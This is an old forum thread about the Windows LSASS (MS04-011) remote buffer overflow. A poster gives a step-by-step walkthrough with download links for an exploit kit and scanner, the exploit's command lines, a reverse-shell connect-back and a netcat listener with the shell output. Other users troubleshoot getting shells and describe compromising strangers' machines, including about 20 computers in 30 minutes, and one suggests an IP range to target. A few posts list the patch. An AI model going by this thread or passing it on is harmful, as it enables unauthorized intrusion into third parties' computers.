Full Version: Lsass Cmd Line
Pages: 1, 2
EXPLOiTED
anyone know of a cmd line lsass scanner?
tweakz20
just do a port scan for ports 445 & 139.. the fix is still not there on most systems
Macsou
Hello

. To exploit Lsass Vulnerability , You need : lsass exploit , Nc.exe ,
sbaanetapi.dll and the scanner DSScan.exe ( Found For You : http://www.foundstone.com/resources/freetools/dsscan.zip? )

. KiT With all You need : http://users.volja.net/exceed/RLsasrv.zip ( RLsasrv.exe = Lsass exploit )


next you must listen a port and Run The exploit :

CODE

C:\Appz\RLsasrv>RLsasrv.exe
Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit
Bug discovered by eEye
Code by sbaa (sysop sbaa 3322 org) 2004/04/24 ver 0.1
Usage:
RLsasrv 0 targetip [Port ConnectBackIP] ----> attack 2k
RLsasrv 1 targetip [Port ConnectBackIP] ----> attack xp

C:\appz\RLsasrv>RLsasrv 0 192.168.20.20  666 192.168.20.10
shellcode size 316



And the Shell will apear in the listen port :


CODE

C:\>nc -l -p 666

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>



Apply this Vulnerability on YOUR OWN SYSTEM .

explicated by Max .
have fun gayzzzzz And sorry for My bad explications .... I am so bad in english ....

Hello Nikscap biggrin.gif
daguilar01
i think hes looking for a cmd line scanner, something that can identify vulnerable machiens but can be used from only the command line
EXPLOiTED
correct you are Dag...exactly how my questino was worded
tweakz20
QUOTE
have fun gayzzzzz

good ole' germans (or whatever nationality) smile.gif

and to confirm it, the program he posted is the GUI scanner
Flowby
QUOTE (Macsou @ Apr 28 2004, 11:31 PM)
Hello

. To exploit Lsass Vulnerability , You need : lsass exploit , Nc.exe ,
sbaanetapi.dll and the scanner DSScan.exe ( Found For You : http://www.foundstone.com/resources/freetools/dsscan.zip? )

. KiT With all You need : http://users.volja.net/exceed/RLsasrv.zip ( RLsasrv.exe = Lsass exploit )


next you must listen a port and Run The exploit :

CODE

C:\Appz\RLsasrv>RLsasrv.exe
Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit
Bug discovered by eEye
Code by sbaa (sysop sbaa 3322 org) 2004/04/24 ver 0.1
Usage:
RLsasrv 0 targetip [Port ConnectBackIP] ----> attack 2k
RLsasrv 1 targetip [Port ConnectBackIP] ----> attack xp

C:\appz\RLsasrv>RLsasrv 0 192.168.20.20  666 192.168.20.10
shellcode size 316



And the Shell will apear in the listen port :


CODE

C:\>nc -l -p 666

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>



Apply this Vulnerability on YOUR OWN SYSTEM .

explicated by Max .
have fun gayzzzzz And sorry for My bad explications .... I am so bad in english ....

Hello Nikscap biggrin.gif

can you tel me from where did you get this link???

http://users.volja.net/exceed/RLsasrv.zip???It is an isp provider from my country so,i woud like to know...?
Icingtaupe
Well, it's look good ( for us ), but it doesn't work with me...

I've found vulnerable IP, ( i was in them... rolleyes.gif ), I've runned a shell with netcat, with parameters -l -p 444, so it's looked :

nc -l -p 444

I thought he was listening... well. Now, I launch the exploit, with the ip target, the port, and my ip. It's looked like this :

rlsasrv.exe (target ip tongue.gif ) 444 (my ip)
shellcode size 316

And sometimes the line

Ret value = 1726

Where ret value seems randomized... but no shell. I've got no firewall, no AV, and the RPC services launched ( for upload ). What's I've done wrong ? ohmy.gif

I've tried around 10 times, no one work... all were vulnerable...

I have to buy a new brain, or to get out that exploit ? O_o

[Edit] Oops, sorry, I've forgotted : I've got XP Pro ... :]

Excuse my english, I'm not from here... but I try to speak the better I can... :]
Macsou
CODE

can you tel me from where did you get this link???

http://users.volja.net/exceed/RLsasrv.zip???It is an isp provider from my country so,i woud like to know...?



WWW.GOOGLE.COM
porc1978
QUOTE (Icingtaupe @ Apr 29 2004, 03:17 AM)
Well, it's look good ( for us ), but it doesn't work with me...

I've found vulnerable IP, ( i was in them... rolleyes.gif ), I've runned a shell with netcat, with parameters -l -p 444, so it's looked :

nc -l -p 444

I thought he was listening... well. Now, I launch the exploit, with the ip target, the port, and my ip. It's looked like this :

rlsasrv.exe (target ip tongue.gif ) 444 (my ip)
shellcode size 316

And sometimes the line

Ret value = 1726

Where ret value seems randomized... but no shell. I've got no firewall, no AV, and the RPC services launched ( for upload ). What's I've done wrong ? ohmy.gif

I've tried around 10 times, no one work... all were vulnerable...

I have to buy a new brain, or to get out that exploit ? O_o

[Edit] Oops, sorry, I've forgotted : I've got XP Pro ... :]

Excuse my english, I'm not from here... but I try to speak the better I can... :]

me too....i've got many ips but no one give shells...also the exploit cmd line gave randomize ret value...like 53 1352 1726......
Ecko
peace peopleZ

ok

so it works (tested often *g*)


if you get shellcode size 316 an nothing differnet (like Ret value e.g.) then it works surely! just search...a tip try the range 62.47.*.* (austria gays smile.gif ) their is a good wy to test biggrin.gif
forza
This works man..

How to protect your LAN against this exploit?
Could be used by WORMS !!
Synchr0
thx man nice Exploit hheeh biggrin.gif ill try it biggrin.gif
Icingtaupe
Well... this is a good exploit, he is beautiful, be some of us don't know who does it work, or WHY ot doesn't work... tongue.gif

If someone could type an example, a thing who (work) , it would be VERY useful, because there is a lot of computers who are waiting for us... :] biggrin.gif
Serhat
I tested the Exploit on my own boxes just to see if the exploit worked good
on win 2k nothing happened {isn't patched}
win xp crashed (blaster stylez) biggrin.gif so it worked on XP smile.gif

Serhat
net_runner
thanks for the step by step guide...
smile.gif
LKM
Well I'm actually trying it on my own 100% WINXP LAN, in which there is 10 VULNERABLE ip's

I also get a "ret value" everytime, without any incoming connexion on my listening port.
The Comp are also getting a "system shutdown in 1min msg box" I never got a shell.

I heard this exploit wasn't working well on XP system, anyone can confirm that ?
misa
i can confirm that it doesnt work on xp without modding
LKM
Well I'd be interested a LOT if a modded exploit .c source was available that would give shell on WinXP. Even a "non reverse" one.

Is this only something to do about the OS offsets or is it deeper than that, misa?
EXPLOiTED
Heh, thanks for getting off topic
Icingtaupe
Well, I wan't only a little explanation :

This exploit only works on ENGLISH OS , isn't it ?

I've tried on French Systems, it seems don't wsorking...

I say the truth when I say it only work on eng. OS ? I've heard it's an history of offset...
LKM
Well my LAN is 100% French WinXp and this exploit caused crash on them, but no shell.

SO I'd say it still "works" a bit on french system.
misa
remember dcom with all those crashes? think what that was about, then think about this one and you'll figure it out wink.gif
Erra
For those that cant get this to work at all, have you thought that maybe its because your ISP is blocking certain ports?

I have been doing a bit of asking around, and it seems that if your ISP blocks those ports like 135 and 139, then you are out of luck, it just wont work for you.

Find another way around it........ get a different ISP..... whatever...
Icingtaupe
My ISP doesn't block these ports... I know this because someone have tried this exploit on me... huh.gif

LKM ... well, in this way, it's a method to force someone to reboot... it would be better with a shell ^^'
Icingtaupe
Hi all !!

For all who it does'nt work...

There is a UNIVERSAL version of this exploit... tongue.gif

Here

It work PERFECTLY, I've tried, and about 20 computers in a time of 30 minutes...

Try it, it's love it !
mamep
it's not working for me sad.gif
like the old..
i don't know the problem..
but i've tried a lot of ips without any results...
Loxy
My ISP blocks 139, and 445 along with some other common ones, all beccause of that lame ass kid who made MSBlaster worm(s) Shame! sad.gif
LKM
THX a lot icingtaupe, I will try it and tell you if it worked smile.gif

EDIT : IT works PERFECTLY on
WINXP SP1 FR
WINXP FR
WIN2K SP4 FR

That's what I tested.

Thanks a lot for sharing that
nettellect
i updated all patches on my target machines and then tried out this exploit. nothing happend on any of the machine. where as i have heard that this this is still not pachted by MS. any body will explain that ? we are using win2000
AsuKa
QUOTE
i updated all patches on my target machines and then tried out this exploit. nothing happend on any of the machine. where as i have heard that this this is still not pachted by MS. any body will explain that ? we are using win2000



Install the MS04-011 Patch

It fixes:

LSASS Vulnerability - CAN-2003-0533
LDAP Vulnerability - CAN-2003-0663
PCT Vulnerability - CAN-2003-0719
Winlogon Vulnerability - CAN-2003-0806
Metafile Vulnerability - CAN-2003-0906
Help and Support Center Vulnerability - CAN-2003-0907
Utility Manager Vulnerability - CAN-2003-0908
Windows Management Vulnerability - CAN-2003-0909
Local Descriptor Table Vulnerability - CAN-2003-0910
H.323 Vulnerability* - CAN-2004-0117
Virtual DOS Machine Vulnerability - CAN-2004-0118
Negotiate SSP Vulnerability - CAN-2004-0119
SSL Vulnerability - CAN-2004-0120
ASN.1 "Double Free" Vulnerability - CAN-2004-0123

------------
Security Bulletin:
hxxp://www.microsoft.com/technet/security/bulletin/MS04-011.mspx

Win 2000 Patch:
hxxp://www.microsoft.com/downloads/details.aspx?FamilyID=0692c27e-f63a-414c-b3eb-d2342fbb6c00&DisplayLang=en

Win XP patch:
hxxp://www.microsoft.com/downloads/details.aspx?FamilyID=3549ea9e-da3f-43b9-a4f1-af243b6168f3&DisplayLang=en
prog
^^
sweet, excellant

I have been messing with this for about 6 hours, this has the potential to do major damage.
Paul
Does that means none knows a scanline for the exploit ? that checks if its vuln/not.
Ecko
yes try DSScan its a vul scanner for this exploit...sorry no link at the moment but it have been posted on the board jus search.

peaz
Chizo
Has anybody offsets for German, Spain etc?
Paul
QUOTE (Ecko @ Apr 30 2004, 01:04 PM)
yes try DSScan its a vul scanner for this exploit...sorry no link at the moment but it have been posted on the board jus search.

peaz

that aint a commandline scanner, its a gui wink.gif
Gargoyle
Hm guys, can anyone tell me what i do wrong?

1. i startet nc -l -p 4000 on my cmd-box
2. i run the exploit

but i only geht ret value = 1736 etc.

has anyone a hint for me ?
Icingtaupe
Yes.

Change the version of exploit ^^"

Hve you tried with the exploit in page °1, or on page 2° ?

The page 2° work a bit more than the first... :]
bullmoosekiller
I was able to use exploit on Win2K eng sp4 but instead of using netcat (ConnectBackIP), I telnet directly to whatever port I use. Fortunely or infortunely here (depending on wich side you're standing), we use automatic Windows Update, so our workstation should be patched. I tried lsass exploit on unpatched french Windows XP sp1 and the exploit crash lsass and by that manner give error from NT Autority\system and reboot the computer after 59 sec. just as the MS blast exploit did. Also I heard that exploit need to have local session open on WinXP to be able to remotely control and I could confirm that (lsass crash when session's open and exploit failed when there's no opened local session).

So as soon as multiple language scode will appear within new modified exploit, then it will be a complete exploit.

Have a nice Week-end
striker13
hello all nice exploit but i've a problem with nc i've testing on many ips ... when i run the exploit it's good but not for nc :
QUOTE

C:\lsass>lsass 0 ipifoundwithdsscan 666 myip
MS0411 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP:ipifoundwithdsscan: OS: WinXP Professonal  [universal] lsass.exe
[*] Connecting to ipifoundwithdsscan:445 ... OK
[*]  Attacking ... OK

then i run nc :
C:\Documents and Settings>strike>cd..

C:\Documents and Settings>..

C:\>nc -l -p 666
and nothing  blink.gif i'm not in c:\winnt\system32...


if you have a answer it's would be great smile.gif sorry for my bad english rolleyes.gif and thx in advance wink.gif




bullmoosekiller
Forgot to mention that I used both version of lsass exploit code...

The first one ; /* from www.cnhonker.com */
and
the 2nd one ; .::[ houseofdabus ]::.

gave me exactly the same result on Windows XP sp1 fr.

So the second (2nd) one isn't Universal as indicated in the code...!

Still have a nice Week-end wink.gif wink.gif
LKM
bullmoosekiller > Je suis français aussi, et ça marche parfaitement sur WINXP SP1 FR UNPATCHED

translation : I tried it many times on WinXP SP1 unpatched host and the 2nd exploit worked perfectly.
bullmoosekiller
Bonjour LKM ( moi j'suis Québecois )

Hi LKM (I'm french canadian)

Strange that you can remote control on your side and me not at all.
Maybe the 2nd exploit is working here but I can't get shell whatever NC is listening or connecting or even telnet the compromise PC port.

Maybe explain me your technique or wich option you're using with NetCat.
digitalk2003
Hello,

In my testings, I've come up with a problem in using the newest version of lsass(4/29/04). For some reason, a shell is not generated.

Initial walkthrough example
--------------------------------
* C:\HOD-ms04011-lsasrv-expl 0 192.168.1.10 4444 -t
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .::[ houseofdabus ]::. ---
*
* [*] Target: IP: 192.168.1.10: OS: WinXP Professional [universal] lsass.exe
* [*] Connecting to 192.168.1.10:445 ... OK
* [*] Detecting remote OS: Windows 5.0
*
*
* C:\HOD-ms04011-lsasrv-expl 1 192.168.1.10 4444
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .::[ houseofdabus ]::. ---
*
* [*] Target: IP: 192.168.1.10: OS: Win2k Professional [universal] netrap.dll
* [*] Connecting to 192.168.1.10:445 ... OK
* [*] Attacking ... OK
*
* C:\nc 192.168.1.10 4444
* Microsoft Windows 2000 [Version 5.00.2195]
* © Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
------------------------------------------------------------------------------------------

Instead of the remote shell, the command prompt just returned me to the directory where I had executed netcat from. blink.gif Anybody else seen this? I also tried connecting through telnet without any luck.

Ciau...

digitalk2003
bullmoosekiller
That's exactly what I'm experiencing during my own test and security assesment. unsure.gif
Flowers
work well but, locked on the drive of the os.
allloco
this ploit is working really fine and i am not only locked to the drive with the os installed
Qlimax
i stiil don't understand how to secure it
someone can post here the fix or how i do that?
tnx..
ILX
well, this gives me something to do this weekend... rolleyes.gif
u can secure it in the same old way u could secure rpc before the microsoft patches, just disable rpc in the registry, works better than all ms patches put together tongue.gif
mich125
hi can you tell exactly what have to be addeded to reg to disdable it

thx
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.